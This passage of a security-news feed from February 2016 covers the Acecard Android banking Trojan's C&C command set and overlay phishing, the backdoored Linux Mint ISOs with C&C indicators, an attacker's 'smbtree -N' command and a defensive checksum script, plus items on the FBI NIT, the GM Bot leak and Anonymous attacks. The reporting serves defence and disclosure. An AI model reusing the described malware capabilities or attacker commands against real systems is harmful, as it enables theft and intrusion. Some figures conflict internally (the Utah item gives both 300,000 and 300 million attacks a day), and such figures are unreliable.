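    stages, verdicts = analyse(SAMPLE_LOG)
    for client in sorted(verdicts):
        print(client, stages[client], "->", verdicts[client])
```

Matching on the destination IP as well as the hostname matters here because the gate is reached from an injected script and may not leave a clean Host header in every log source; the keyword fallback is what keeps the rule useful after the actors move the gate to a fresh domain.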
The Evolution of Acecard
22.2.2016 Source: Kaspersky Virus
While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard. This family accounted for almost all the banker Trojan attacks in Australia.
After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications. In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords. Two other apps are targeted by the Trojan for their credit card details. But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages.
Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first Android Trojan to use Tor, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices. All three Trojans run on Android.
How it all started
Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family.
It all started with Backdoor.AndroidOS.Torec.a. The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server:
#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C;
#grab_apps – send a list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to numbers specified in the command;
#control_number – change the phone’s control number.
Then, in April 2014, a new version emerged with more capabilities. The additional commands were:
#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the SMS interception list;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#sentid – send an SMS with the Trojan’s ID to a specified number.
In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a. It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C.
A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields.
We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware. From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family.
An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. Here are some clear examples:
Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a
Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a
Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a
Here is another example:
Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a
Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a
Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a
A lot of the class, method and variable names are the same for all three Trojans. The code of the corresponding methods is either the same or very similar with only minor differences.
Acecard’s progress
The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C:
#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number.
The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor. Besides that, we identified two more differences. Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec:
#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the list of senders from which SMSs will be intercepted;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send the Trojan’s ID to the C&C;
#grab_apps – send the list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number;
#sentid – send an SMS with the Trojan’s ID to a specified number;
#show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters.
The second difference was the number of phishing windows. Along with the official Google Play Store app, this Trojan now overlaid the display of the following apps with its own windows:
IM services: WhatsApp, Viber, Instagram, Skype;
the apps of the VKontakte, Odnoklassniki and Facebook social networks;
the Gmail client;
the official Twitter client.
In the second half of October 2014, we detected the next modification of Acecard. It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users. The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users. This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries.
At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US. The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia.
A new modification of Acecard emerged in mid-November 2014. As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks.
This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect.
This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down. This check is carried out in almost all subsequent modifications. Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware.
For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window.
There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings.
It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015. Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month.
Number of Acecard files detected each month
The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans. The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan.
Also at this time, there was an increase in the number of attacks using this malicious program.
The number of unique users attacked by Acecard per month
In the first half of September, we detected a new modification of Acecard. Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks.
This means that this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window.
The subsequent development of Acecard’s “banking business” then got even faster:
The next modification emerged just several days later, and was capable of overlaying as many as 20 banking applications. The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks.
In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal. The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS. This version of Acecard intercepts SMSs from 17 Russian banks.
Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks. Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users. In that month, the US came third in terms of the number of unique users attacked by this malware.
In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app.
A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank.
It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command.
The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems. Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger.
Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France.
Number of unique users attacked by country
In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users.
Propagation
In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software. This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard.
We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store.
A Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store
The Trojan propagates under the guise of a game, but in reality it has no useful functionality. The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard. Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen.
We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c. It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges, Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to delete using standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor.
The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans. This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users.
MD5
Beware of Backdoored Linux Mint ISOs
22.2.2016 Source: Kaspersky Virus
Yesterday a blog post on “The Linux Mint Blog” caught our attention. Apparently criminals managed to compromise a vulnerable instance of WordPress which the project used to run their website. The attackers modified download links pointing to backdoored ISO files of Linux Mint 17.3 Cinnamon edition. This “should only impact people who downloaded this edition on February 20th”, the author of the blog stated.
We managed to get our hands on the malware embedded in the ISO images. Let’s have a quick look.
Malware used
The criminals used a simple backdoor, which is controlled via an unencrypted IRC connection. We found five hardcoded C&C addresses. At the time of writing only one of them was available. We saw approx. 50 connected clients just in this channel called “#mint”:
IRC channels and user count on malicious C&C server
The malware is capable of:
running several types of UDP and TCP flooding (used in DDoS attacks)
downloading arbitrary files to the victim’s machine
executing arbitrary commands on the machine
We’re detecting this type of malware as HEUR:Backdoor.Linux.Tsunami.bh.
According to user reports, the compromised ISO images come with the backdoor’s C-source code, located in /var/lib/man.cy, which is compiled on first startup to “apt-cache” and is then executed.
Activity
While monitoring the C&C channel, we saw the criminal sending several SMB-related commands like “smbtree -N” to the connected bots. Apparently the attacker tries to access SMB/CIFS shares available in the local network of the victims.
Conclusion
In order to detect this kind of attack, one should use PKI with strong cryptographic signatures to ensure the integrity of downloaded software.
Integrity-checks based on file hashes like MD5 or SHA256 are insecure if a project’s website is compromised, since the attacker could also adjust the checksums provided on the website.
FBI must reveal the network investigative technique used to hack more than 1000 computers
22.2.2016 Hacking
The FBI must provide details on the network investigative technique used to hack more than 1000 computers in a case involving child pornography.
In a case involving child pornography, a judge ordered the FBI to provide all the code used to hack the suspects' PCs, along with detailed information on the procedure followed to de-anonymize Tor users.
Colin Fieman, a federal public defender working on the case, was asked by motherboard.vice.com whether the code would include exploits to bypass security features; Fieman's reply was that the code would bypass "everything."
“The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified,” he told Motherboard.
Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested by the FBI right after the FBI closed a popular child pornography site called “Playpen” hosted on the dark web, a site on which the agency deployed a network investigative technique (NIT), its term for a hacking tool.
The use of the NIT was also confirmed earlier this year, when court documents reviewed by Motherboard showed that the FBI had used it to identify suspects while they were browsing the Tor network.
The network investigative technique (NIT) got the suspects’ real IP address, the MAC address and other pieces of information and sent them to the FBI machines.
In July, at least two individuals from New York were charged with online child pornography crimes after visiting a hidden service on the Tor network.
According to the court documents, the FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.” The FBI was able to harvest around 1300 IPs, and so far 137 people have been charged. The network investigative technique used by the FBI affected computers in the UK, Chile and Greece.
In January, a report published by the Washington Post confirmed that in the summer of 2013 the Feds hacked the TorMail service by injecting the NIT code into the mail page in an attempt to track its users.
The problem is that the FBI used only one warrant to hack the computers of unknown suspects all over the world. The defense also argues that the FBI left the child pornography site running in order to be able to deploy the network investigative technique.
Last month a judge ruled that the FBI’s actions did not constitute “outrageous conduct,” but a new order now obliges the FBI to disclose all the code components used in the network investigative technique.
Michaud’s lawyers had been trying to obtain the technique and code used by the FBI since September, but it was not until January that Vlad Tsyrklevich (the defense’s consulting expert) received the discovery.
Tsyrklevich now argues that the code provided was incomplete and missing several parts. Part of the missing code is the component that identifies Michaud’s PC. Tsyrklevich also claimed that the exploit used to break into the machines is among the missing parts.
“This component is essential to understanding whether there were other components that the Government caused to run on Mr. Michaud’s computer, beyond the one payload that the Government has provided,” Michaud’s lawyers wrote.
This is not the first time that judges have requested that the FBI disclose code used in hacking operations. In 2012, in a case called Operation Torpedo, the FBI disclosed details of a Metasploit module used in its investigation.
Wired revealed that law enforcement relied on the popular Metasploit framework to first de-anonymize operators of child porn websites on the Tor network.
“Now Metasploit has a new and surprising fan: the FBI. WIRED has learned that FBI agents relied on Flash code from an abandoned Metasploit side project called the “Decloaking Engine” to stage its first known effort to successfully identify a multitude of suspects hiding behind the Tor anonymity network.” states the report published by Wired.
Operation Torpedo was revealed when the FBI seized three child porn sites on Tor based in Nebraska. The FBI, authorized by a special search warrant crafted by Justice Department lawyers in Washington, DC, delivered the tracking Flash code to de-anonymize visitors. The operation allowed the FBI to identify at least 25 users in the US and many others in foreign countries.
There is no doubt that cases like this one will become more frequent, and it is possible that in the future more court orders will require the disclosure of all the information about a “target”.
Source code of the Android GM Bot malware was leaked online
22.2.2016 Android
The experts at the IBM X-Force threat intelligence have discovered that the source code for Android malware GM Bot was leaked online.
Bad news for the Android community: the experts at IBM X-Force threat intelligence have discovered that the source code for the Android malware GM Bot was leaked on an underground forum. The source code was leaked in December 2015 and includes the bot component and the control panel.
It seems that one of GM Bot’s buyers decided to leak the code online to enhance credibility in the underground boards.
He leaked the code in an encrypted archive, then he indicated he would give the password only to active forum members who contacted him.
Of course, the code rapidly spread within the criminal ecosystem; it is now freely available online, together with a tutorial and instructions for the server-side installation.
The availability online of the source code of a malware represents a crucial moment in the life cycle of malicious codes. Once the code is leaked online, cyber criminal organizations can work on it to create new variants that could be offered for sale or rent.
The original creator of the Android malware has sold the rights to distribute GM Bot v1 (aka MazarBot) to other cyber criminal organizations, which are offering it for $500.
“According to X-Force threat intelligence, the code’s author moved on to working on a new version dubbed GM Bot v2.0, which is sold in financial fraud-themed underground boards.” states a blog post published by the X-Force threat intelligence.
GM Bot appeared in the wild in 2014, it was offered in the Russian underground as a powerful instrument for mobile phishing.
“This Android malware’s differentiating capability is its deployment of overlay screens on top of running banking applications, with the goal of tricking users into entering their access credentials into a fake window that will grab and forward them to a remote attacker.” continues the post.
The malware implements a number of features to target Android users, including intercepting SMS messages. The malware allows attackers to gain control of the targeted device, including the customization of fake screens.
In short, mobile banking Trojans such as GM Bot are a one-stop fraud shop for criminals:
They launch fake overlay windows that mimic bank applications to steal user credentials and payment card details.
They control the device’s SMS relay to eavesdrop, intercept and send out SMS messages.
They can forward phone calls to a remote attacker.
They have spyware features and can control the device via remote commands.
The IBM experts analyzed only the control panel, because many other organizations and security firms had already produced detailed analyses of the malware.
The most interesting feature discovered by the experts in the GM Bot’s botnet administration panel is the possibility to create and deploy new injections to infected user devices.
Another interesting component of the botnet is the “Search and Stats” section, which allows operators to query their database of stolen information: credit card details, lists of apps installed on infected devices, the victims’ bank accounts and other data.
I suggest taking a look at the interesting analysis published by IBM, which also includes the indicators of compromise.
Anonymous took down several government websites of Saudi Arabia
22.2.2016 Hacking
Anonymous launched a series of cyber attacks against government websites of Saudi Arabia to protest the execution of 47 people, including Mr. Sheikh Nimr Al Nimr.
The Anonymous collective is conducting a hacking campaign against the Saudi Arabian Government to protest executions of 47 people.
On January 2nd, the Government announced the executions on terrorism charges; among those executed were Sheikh Nimr Al Nimr and the convicted al-Qaeda leader Faris al-Zahrani.
The executions raised the tension between Saudi Arabia and Iran, but the events also triggered the Anonymous response.
The attacks launched by Anonymous are executed as part of the operations #OpSaudi and #OpNimr.
The #OpNimr campaign was launched in September 2015 to protest continuous violations of human rights. Anonymous targeted Saudi websites in response to the death sentence handed down to 17-year-old Mohammed al-Nimr.
Ali al-Nimr was sentenced to death on 27 May 2014, when he was only 17 years old, for taking part in demonstrations against the government, attacking the security forces, possessing a machine-gun and armed robbery.
The man is also accused of using a BlackBerry to encourage people to join the protest.
As explained by Amnesty International, the Government based its judgment on confessions extorted under torture. Members of Anonymous started their campaign calling for Nimr’s release; the hacktivists added that he had been denied a lawyer and confirmed the torture.
The series of cyber attacks that recently targeted the Saudi Arabian Government shut down the official websites of the Ministry of Defense, the Royal Air Force, the Saudi Ministry of Education and the Saudi Press Association, the Saudi Defense ministry website, the Saudi Customs Service, the Saudi Ministry of Finance, the Saudi Ombudsman’s Office and the General Passports Service.
The websites have been already restored.
Warning! — Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System
21.2.2016 Hacking
Are you also one of those who downloaded Linux Mint on February 20th? You may have been infected!
Linux Mint is one of the best and popular Linux distros available today, but if you have downloaded and installed the operating system recently you might have done so using a malicious ISO image.
Here's why:
Last night, some unknown hacker or group of hackers managed to hack into the Linux Mint website and replaced the download links on the site so that they pointed to one of their servers offering malicious ISO images for the Linux Mint 17.3 Cinnamon Edition.
"Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it," the head of Linux Mint project Clement Lefebvre said in a surprising announcement dated February 21, 2016.
Who are affected?
As far as the Linux Mint team knows, the issue only affects the one edition, and that is Linux Mint 17.3 Cinnamon edition.
The situation happened last night, so the issue only impacts people who downloaded the above-mentioned version of Linux Mint on February 20th.
If you downloaded the Cinnamon edition before Saturday, February 20th, the issue does not affect you. If you downloaded a different edition, or Mint 17.3 Cinnamon via torrent or a direct HTTP link, it does not affect you either.
What had Happened?
The hackers are believed to have accessed the underlying server via the team's WordPress blog and then obtained shell access as www-data.
From there, the hackers manipulated the Linux Mint download page and pointed it to a malicious FTP (File Transfer Protocol) server hosted in Bulgaria (IP: 5.104.175.212), the investigative team discovered.
The infected Linux ISO images installed the complete OS with the Internet Relay Chat (IRC) backdoor Tsunami, giving the attackers access to the system via IRC servers.
Tsunami is a well-known Linux ELF trojan that is a simple IRC bot used for launching Distributed Denial of Service (DDoS) attacks.
Hackers vs. Linux Mint SysAdmins
However, the Linux Mint team managed to discover the hack, cleaned up the links from their website quickly, announced the data breach on their official blog, and then it appears that the hackers compromised its download page again.
Knowing that it had failed to eliminate the hackers' exact point of entry, the Linux Mint team took the entire linuxmint.com domain offline to prevent the ISO images from spreading to its users.
The Linux Mint official website is currently offline until the team investigates the issue entirely. However, the hackers' motive behind the hack is not clear yet.
"What we don't know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this," Lefebvre added.
Hackers Selling Linux Mint Website's Database
The hackers are selling the full Linux Mint website database for just $85, which is a sign of their lack of knowledge.
The hack seems to be the work of script kiddies or an inexperienced group, as they opted to infect a top-shelf Linux distro with a simple IRC bot that was already considered outdated in early 2010; otherwise they would have used more dangerous malware such as banking Trojans.
Also, even after the hack was initially discovered, the hackers re-compromised the site, which again shows the hackers' lack of experience.
Here's How to Protect your Linux Machine
Users who have the ISO image can check its signature to make sure it is genuine.
To check for an infected download, you can compare the ISO's MD5 checksum with the official values included in Lefebvre's blog post.
If found infected, users are advised to follow these steps:
Take the computer offline.
Backup all your personal data.
Reinstall the operating system (with a clean ISO) or format the partition.
Change passwords for sensitive websites and emails.
You can read full detail about the hack here. The official website is not accessible at the time of writing. We’ll update the story when we hear more.
Utah systems experience 300k hacking attacks a day due to the presence of the NSA Data Center
21.2.2016 Hacking
Representatives of the State of Utah confirmed that their systems experience 300,000 hacking attacks a day due to the presence of the NSA Data Center.
The Utah state computer systems experience 300 million hacking attacks a day due to the presence of the NSA data center in the state.
The Utah Data Center, also known as the Intelligence Community Comprehensive National Cybersecurity Initiative Data Center, is the mammoth data storage facility built by the NSA to store data gathered by US intelligence. The official mission of the center is classified; the facility is located at Camp Williams near Bluffdale, Utah.
Photo: the NSA's Utah Data Center in Bluffdale, Utah, Thursday, June 6, 2013 (AP Photo/Rick Bowmer).
Edward Snowden revealed the project was initially known as the Massive Data Repository within NSA, but was renamed to Mission Data Repository.
NSA Utah Data Center Lightweight Security for Sparse Staff Unlike HQ Bloat
40°25’36.59″ N 111°55’57.92″ W pic.twitter.com/sdlLO0eJC5
— Cryptome (@Cryptomeorg) 20 February 2016
The presence of the data center attracts hackers, as explained by the office of the Utah Commissioner of Public Safety, which confirmed a significant increase in the number of cyber attacks over the years.
“In 2010, my IT director was letting me know that the number of attacks we were averaging a day were between 25,000 to 80,000,” said Keith Squires, Utah Commissioner of Public Safety. “We had peaks in the past year or so that were over 300,000,000 a day.”
Hackers use botnets to scan the state’s computer systems, searching for vulnerable systems.
“Although other states were seeing increases, most were not seeing anything like we were,” Squires said. “We didn’t realize it at first, but my opinion is in that same time, Utah was getting a lot of notoriety for the NSA facility that was being built here.”
The number of cyber attacks against the computer systems of other US states has also increased in recent years, but the trend observed for Utah is singular.
“The dynamics of Utah have changed,” the State of Utah’s Information Security Director told KUTV.
Utah hosts government entities and technology companies working in the intelligence and cyber security industries, which makes their systems a privileged target for attackers.
The journalists at 2News interviewed Neil Wyler, a former punk hacker, now a cyber security expert and consultant, asking him how hackers operate to compromise government entities.
Wyler explained that attackers can target almost any system, including third parties, to find a way into US government networks.
“To illustrate, he used a hypothetical example of a business that hackers could not penetrate, but they knew employees of the company liked to eat at a pizza place down the street. So the hackers infiltrated the pizza business website, spread pizza coupons at the firm that was their real target — encouraging workers to download a corrupted pizza “menu” — only to allow the hackers to troll the real target’s computers.” states Wyler.
Squires highlighted the security posture of the state’s critical infrastructure: facilities such as the NSA data center and the airport were designed with “totally separate” networks.
But let me add that security is a point-in-time property: what is safe now may not be a few seconds later.
Linux Mint was hacked, website served malicious ISO on Saturday
21.2.2016 Hacking
The Linux Mint website was hacked on Saturday: intruders compromised it and used it to serve a malicious ISO of the Linux Mint 17.3 Cinnamon edition.
The Linux Mint website was hacked on Saturday, February 20: intruders compromised the site and used it to serve a backdoored ISO of the Linux Mint 17.3 Cinnamon edition.
The disconcerting announcement was made by Clement Lefebvre, the head of the Linux Mint project. Lefebvre explained that the Linux Mint website had been compromised and that the attackers used it to distribute a backdoored ISO of Linux Mint 17.3 Cinnamon edition.
“I’m sorry I have to come with bad news. We were exposed to an intrusion today. It was brief and it shouldn’t impact many people, but if it impacts you, it’s very important you read the information below.
Beware of hacked ISOs if you downloaded Linux Mint on February 20th! https://t.co/cexMF2USWS
— Linux Mint (@Linux_Mint) 21 February 2016
What happened?
Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it.” wrote Clement Lefebvre.
Users that downloaded the Linux Mint 17.3 Cinnamon edition prior to Saturday, or any other version/flavour (including Mint 17.3 Cinnamon via torrent or direct HTTP link), are not affected.
The Linux Mint team has since cleaned up the website.
Lefebvre urges users to check the MD5 checksum of any ISO they downloaded in order to detect a modified image. Keep in mind that a checksum obtained from the same website that was compromised is only as trustworthy as that website: compare it against a copy obtained through another channel before relying on it.
“If you still have the ISO file, check its MD5 signature with the command “md5sum yourfile.iso” (where yourfile.iso is the name of the ISO).” continues the post.
Below is the list of valid checksums:
6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso
e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso
30fef1aa1134c5f3778c77c4417f7238 linuxmint-17.3-cinnamon-nocodecs-32bit.iso
3406350a87c201cdca0927b1bc7c2ccd linuxmint-17.3-cinnamon-nocodecs-64bit.iso
df38af96e99726bb0a1ef3e5cd47563d linuxmint-17.3-cinnamon-oem-64bit.iso
“If you still have the burnt DVD or USB stick, boot a computer or a virtual machine offline (turn off your router if in doubt) with it and let it load the live session.
Once in the live session, if there is a file in /var/lib/man.cy, then this is an infected ISO.”
If you have an infected ISO, delete it, discard any discs burnt from it, and format any USB sticks it was written to.
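As an added example (not part of the Linux Mint announcement or the project’s own tooling), the following Python script automates both checks described above: it streams an ISO through MD5 and compares the digest with the published list, keyed on the file name, and it looks for the /var/lib/man.cy indicator under a given root, such as a mounted live-session filesystem. The checksum table is the one quoted above; any sample file used with it is constructed.

```python
import hashlib
import os

# Published MD5 checksums for the Linux Mint 17.3 Cinnamon ISOs (from the
# project's announcement quoted above).
KNOWN_MD5 = {
    "linuxmint-17.3-cinnamon-32bit.iso": "6e7f7e03500747c6c3bfece2c9c8394f",
    "linuxmint-17.3-cinnamon-64bit.iso": "e71a2aad8b58605e906dbea444dc4983",
    "linuxmint-17.3-cinnamon-nocodecs-32bit.iso": "30fef1aa1134c5f3778c77c4417f7238",
    "linuxmint-17.3-cinnamon-nocodecs-64bit.iso": "3406350a87c201cdca0927b1bc7c2ccd",
    "linuxmint-17.3-cinnamon-oem-64bit.iso": "df38af96e99726bb0a1ef3e5cd47563d",
}

# Indicator file the project named for the backdoored live session.
INDICATOR_FILE = os.path.join("var", "lib", "man.cy")


def md5_of_file(path, chunk_size=1 << 20):
    """MD5 hex digest of a file, streamed so multi-GB ISOs do not load into RAM."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_iso(path, known=KNOWN_MD5):
    """Return (status, digest); status is 'ok', 'mismatch' or 'unknown'.
    A file whose name is not in the table is never reported as 'ok'."""
    name = os.path.basename(path)
    digest = md5_of_file(path)
    expected = known.get(name)
    if expected is None:
        return "unknown", digest
    return ("ok" if digest == expected.lower() else "mismatch"), digest


def live_session_infected(root="/"):
    """True if the indicator file the project named exists under root
    (the running live session, or a mounted live-session filesystem)."""
    return os.path.exists(os.path.join(root, INDICATOR_FILE))


if __name__ == "__main__":
    import sys
    for iso in sys.argv[1:]:
        status, digest = verify_iso(iso)
        print(f"{status.upper():8} {digest}  {os.path.basename(iso)}")
    print("indicator file present under /:", live_session_infected("/"))
```

Run it as `python3 check_mint.py ~/Downloads/linuxmint-17.3-cinnamon-64bit.iso`. A renamed download reports UNKNOWN rather than OK, so nothing is accepted on the strength of its contents alone, and the same caveat as above applies: the table is only as good as the channel you obtained it from.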
If you have installed Linux Mint from an infected ISO follow these steps:
Take the computer offline.
Backup personal data.
Reinstall the OS (with a clean ISO) or format the partition.
And change passwords to sites you used – especially email accounts.
Who is behind the attack?
The hacked ISOs are hosted on a server with the IP 5.104.175.212 and the backdoor connects to the absentvodka.com domain.
The IP address and the domain used in the attack lead to three people located in Sofia, Bulgaria; their roles in the attack are not clear.
“What we don’t know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this.” added Clement Lefebvre.
San Bernardino shooter’s Apple ID passcode changed in government custody
21.2.2016 Apple
While discussing the San Bernardino shooter’s iPhone, Apple executives said the Apple ID password was changed while the device was in government custody.
The discussion about the San Bernardino shooter’s iPhone has monopolized media in this week, a US magistrate ordered Apple to help unlock the mobile device, but the company refused to do so.
New details are circulating: according to unnamed Apple executives, the shooter’s Apple ID password was changed while the phone was in government custody, which blocked the route to a fresh iCloud backup.
The password associated with the Apple ID linked to the San Bernardino shooter’s iPhone was changed less than 24 hours after the feds took possession of the mobile device.
This made it impossible to obtain a new backup of the information the government was seeking.
According to Buzzfeed, the company executives revealed that Apple had been helping federal officials with the investigation when the password change was discovered.
According to Apple, it had been helping the FBI with the investigation since early January 2016, but it appears that law enforcement contacted the company only after attempting to access the iPhone on its own.
“The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a backdoor. One of those methods would have involved connecting the iPhone to a known Wi-Fi network and triggering an iCloud backup that might provide the FBI with information stored to the device between the October 19th and the date of the incident.” states Buzzfeed.
“Apple sent trusted engineers to try that method, the executives said, but they were unable to do it. It was then that they discovered that the Apple ID password associated with the iPhone had been changed. (The FBI claimed earlier Friday that this was done by someone at the San Bernardino Health Department.)”
Shortly after the attack, an unnamed San Bernardino official reset the password of the Apple ID associated with Farook’s iPhone.
Resetting the Apple ID password invalidates the iCloud credentials held by devices signed in with that account, so the phone no longer backs up automatically; the new password has to be entered on the device before synchronization resumes.
In the case of the terrorist’s iPhone that was not possible, because the device was already locked, so the feds were unable to trigger an iCloud backup even by bringing the phone within range of a known Wi-Fi network.
The remaining possibility that has been discussed is pushing an iOS software update that forces the iPhone to back itself up to a third-party server.
The executives explained that creating backdoor access to iOS devices would be a serious risk to the privacy of millions of users: it could be used against virtually any Apple device and open the door to mass surveillance.
Project Cumulus – Tracking fake phished credentials leaked to Dark Web
21.2.2016 Hacking
Project Cumulus – A group of experts at Bitglass used watermarks to track data through the Dark Web and discover how far do phished credentials get.
